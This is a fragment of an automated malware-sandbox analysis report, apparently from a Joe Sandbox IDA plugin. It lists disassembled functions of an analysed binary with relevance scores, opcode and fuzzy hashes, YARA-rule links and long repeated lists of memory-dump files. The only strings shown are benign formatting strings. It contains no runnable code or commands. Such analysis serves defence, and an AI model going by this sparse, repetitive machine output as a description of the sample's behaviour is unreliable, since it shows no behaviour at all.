                                                                                                                        • Instruction ID: fcd5bf80195c889a725a38bf427566f3c40b32076c59f2ba76fb64061c7e85b3
                                                                                                                        • Opcode Fuzzy Hash: d9901d8a0a98554f776934754b4b3648c0fa7747c17255cc45018982e20b3075
                                                                                                                        • Instruction Fuzzy Hash: 56E199B5518340DFE720EF64D881B5ABBF6FB86350F48982CE6898B251D731E815CF92
                                                                                                                        Function 00658590 Relevance: 4.1, Strings: 3, Instructions: 387COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.1578324382.0000000000651000.00000040.00000001.01000000.00000003.sdmp, Offset: 00650000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.1578304922.0000000000650000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1578360219.00000000006B0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1578377219.00000000006BA000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1578391508.00000000006BB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1578405596.00000000006BC000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1578495322.0000000000821000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1578509899.0000000000823000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1578527080.000000000083D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1578540509.000000000083E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1578553959.000000000083F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1578553959.000000000084B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1578582034.0000000000850000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1578595729.0000000000852000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1578609286.0000000000853000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1578622742.0000000000856000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1578638320.000000000085E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1578652039.0000000000864000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1578668898.0000000000879000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1578682258.000000000087B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1578696493.0000000000885000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1578711977.0000000000892000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1578728918.00000000008A7000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1578742998.00000000008AC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1578756997.00000000008AD000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1578771362.00000000008B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1578785845.00000000008BF000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1578799697.00000000008C3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1578813061.00000000008CA000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1578826126.00000000008CB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1578844872.00000000008DA000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1578860247.00000000008DC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1578873305.00000000008DD000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1578887150.00000000008E1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1578900029.00000000008E2000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1578914604.00000000008EB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1578930487.00000000008FC000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1578943142.00000000008FD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1578958132.000000000090B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1578971539.000000000090D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1578971539.0000000000928000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1579008014.0000000000955000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1579022191.0000000000956000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1579034824.0000000000957000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1579034824.000000000095F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1579063116.000000000096D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1579077547.000000000096E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_650000_file.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID: )$)$IEND
                                                                                                                        • API String ID: 0-588110143
                                                                                                                        • Opcode ID: 4363c239e82b97a298e99f2b4ac7c7b2fd90d828248d601e0082ef727095633e
                                                                                                                        • Instruction ID: da007b41ae9f582e7053211890221d81595a7b2bbe2bcfd56652984865e5a1d5
                                                                                                                        • Opcode Fuzzy Hash: 4363c239e82b97a298e99f2b4ac7c7b2fd90d828248d601e0082ef727095633e
                                                                                                                        • Instruction Fuzzy Hash: B7E1E2B1A083019FE310CF28C84176ABBE2BF94315F14492DF995A7781DB75E919CBC6
                                                                                                                        Function 006535B0 Relevance: 2.9, Strings: 2, Instructions: 411COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.1578324382.0000000000651000.00000040.00000001.01000000.00000003.sdmp, Offset: 00650000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.1578304922.0000000000650000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1578360219.00000000006B0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1578377219.00000000006BA000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1578391508.00000000006BB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1578405596.00000000006BC000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1578495322.0000000000821000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1578509899.0000000000823000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1578527080.000000000083D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1578540509.000000000083E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1578553959.000000000083F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1578553959.000000000084B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1578582034.0000000000850000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1578595729.0000000000852000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1578609286.0000000000853000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1578622742.0000000000856000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1578638320.000000000085E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1578652039.0000000000864000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1578668898.0000000000879000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1578682258.000000000087B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1578696493.0000000000885000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1578711977.0000000000892000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1578728918.00000000008A7000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1578742998.00000000008AC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1578756997.00000000008AD000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1578771362.00000000008B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1578785845.00000000008BF000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1578799697.00000000008C3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1578813061.00000000008CA000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1578826126.00000000008CB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1578844872.00000000008DA000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1578860247.00000000008DC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1578873305.00000000008DD000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1578887150.00000000008E1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1578900029.00000000008E2000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1578914604.00000000008EB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1578930487.00000000008FC000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1578943142.00000000008FD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1578958132.000000000090B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1578971539.000000000090D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1578971539.0000000000928000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1579008014.0000000000955000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1579022191.0000000000956000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1579034824.0000000000957000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1579034824.000000000095F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1579063116.000000000096D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1579077547.000000000096E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_650000_file.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID: Inf$NaN
                                                                                                                        • API String ID: 0-3500518849
                                                                                                                        • Opcode ID: 5ccb1a6ea1fb6637b1106a3b393cb470e7bd528d2d3c645f8645e99fa1269e0c
                                                                                                                        • Instruction ID: 9a06577f4f240f4c86102a26e596d6fa802a33fa38f56b4470364c809369f510
                                                                                                                        • Opcode Fuzzy Hash: 5ccb1a6ea1fb6637b1106a3b393cb470e7bd528d2d3c645f8645e99fa1269e0c
                                                                                                                        • Instruction Fuzzy Hash: B2D1E8B1A083119BC704CF29C98065EB7E6EBC8B91F15892DFD9997390E771DD098B82
                                                                                                                        Function 00655160 Relevance: 1.8, Strings: 1, Instructions: 577COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.1578324382.0000000000651000.00000040.00000001.01000000.00000003.sdmp, Offset: 00650000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.1578304922.0000000000650000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1578360219.00000000006B0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1578377219.00000000006BA000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1578391508.00000000006BB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1578405596.00000000006BC000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1578495322.0000000000821000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1578509899.0000000000823000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1578527080.000000000083D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1578540509.000000000083E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1578553959.000000000083F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1578553959.000000000084B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1578582034.0000000000850000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1578595729.0000000000852000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1578609286.0000000000853000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1578622742.0000000000856000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1578638320.000000000085E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1578652039.0000000000864000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1578668898.0000000000879000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1578682258.000000000087B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1578696493.0000000000885000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1578711977.0000000000892000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1578728918.00000000008A7000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1578742998.00000000008AC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1578756997.00000000008AD000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1578771362.00000000008B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1578785845.00000000008BF000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1578799697.00000000008C3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1578813061.00000000008CA000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1578826126.00000000008CB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1578844872.00000000008DA000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1578860247.00000000008DC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1578873305.00000000008DD000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1578887150.00000000008E1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1578900029.00000000008E2000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1578914604.00000000008EB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1578930487.00000000008FC000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1578943142.00000000008FD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1578958132.000000000090B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1578971539.000000000090D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1578971539.0000000000928000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1579008014.0000000000955000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1579022191.0000000000956000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1579034824.0000000000957000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1579034824.000000000095F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1579063116.000000000096D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1579077547.000000000096E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_650000_file.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID: %1.17g
                                                                                                                        • API String ID: 0-1551345525
                                                                                                                        • Opcode ID: efa05133b3e1c61927030e1b6624e7e5b9ca5924f4a436e83af42752cec83989
                                                                                                                        • Instruction ID: dc6a1ae57a8bd3071aac1b8f2111ac131487a3d6a1bb12d0e16c1393734611c7
                                                                                                                        • Opcode Fuzzy Hash: efa05133b3e1c61927030e1b6624e7e5b9ca5924f4a436e83af42752cec83989
                                                                                                                        • Instruction Fuzzy Hash: C322D3B2A08B42CBE7158E18C868366BBA3AFE4316F19856DDC5B4B351E771DC0DC742
                                                                                                                        Function 00666EBF Relevance: 1.7, Strings: 1, Instructions: 447COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.1578324382.0000000000651000.00000040.00000001.01000000.00000003.sdmp, Offset: 00650000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.1578304922.0000000000650000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1578360219.00000000006B0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1578377219.00000000006BA000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1578391508.00000000006BB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1578405596.00000000006BC000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1578495322.0000000000821000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1578509899.0000000000823000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1578527080.000000000083D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1578540509.000000000083E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1578553959.000000000083F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1578553959.000000000084B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1578582034.0000000000850000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1578595729.0000000000852000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1578609286.0000000000853000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1578622742.0000000000856000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1578638320.000000000085E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1578652039.0000000000864000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1578668898.0000000000879000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1578682258.000000000087B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1578696493.0000000000885000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1578711977.0000000000892000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1578728918.00000000008A7000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1578742998.00000000008AC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1578756997.00000000008AD000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1578771362.00000000008B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1578785845.00000000008BF000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1578799697.00000000008C3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1578813061.00000000008CA000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1578826126.00000000008CB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1578844872.00000000008DA000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1578860247.00000000008DC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1578873305.00000000008DD000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1578887150.00000000008E1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1578900029.00000000008E2000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1578914604.00000000008EB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1578930487.00000000008FC000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1578943142.00000000008FD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1578958132.000000000090B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1578971539.000000000090D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1578971539.0000000000928000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1579008014.0000000000955000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1579022191.0000000000956000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1579034824.0000000000957000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1579034824.000000000095F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1579063116.000000000096D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1579077547.000000000096E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_650000_file.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID: %*+(
                                                                                                                        • API String ID: 0-3233224373
                                                                                                                        • Opcode ID: a736c505fa972d89c48b6bae6c159074de7e945e57c0679abe8100210d06f4d7
                                                                                                                        • Instruction ID: 3b6ca217b8486606ee83ae342364917f976e63a2b6811ebdb6ce5046049bc49a
                                                                                                                        • Opcode Fuzzy Hash: a736c505fa972d89c48b6bae6c159074de7e945e57c0679abe8100210d06f4d7
                                                                                                                        • Instruction Fuzzy Hash: 0EF17DB5600B01CFC7249F24E891A26B7F7FF88315B148A6DE49787AA1EB31F815CB45
                                                                                                                        Function 00657CA4 Relevance: 1.7, Strings: 1, Instructions: 438COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.1578324382.0000000000651000.00000040.00000001.01000000.00000003.sdmp, Offset: 00650000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.1578304922.0000000000650000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1578360219.00000000006B0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1578377219.00000000006BA000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1578391508.00000000006BB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1578405596.00000000006BC000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1578495322.0000000000821000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1578509899.0000000000823000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1578527080.000000000083D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1578540509.000000000083E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1578553959.000000000083F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1578553959.000000000084B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1578582034.0000000000850000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1578595729.0000000000852000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1578609286.0000000000853000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1578622742.0000000000856000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1578638320.000000000085E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1578652039.0000000000864000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1578668898.0000000000879000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1578682258.000000000087B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1578696493.0000000000885000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1578711977.0000000000892000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1578728918.00000000008A7000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1578742998.00000000008AC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1578756997.00000000008AD000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1578771362.00000000008B1000.00000040.00000001.01000000.00000003.sdmpDownload File
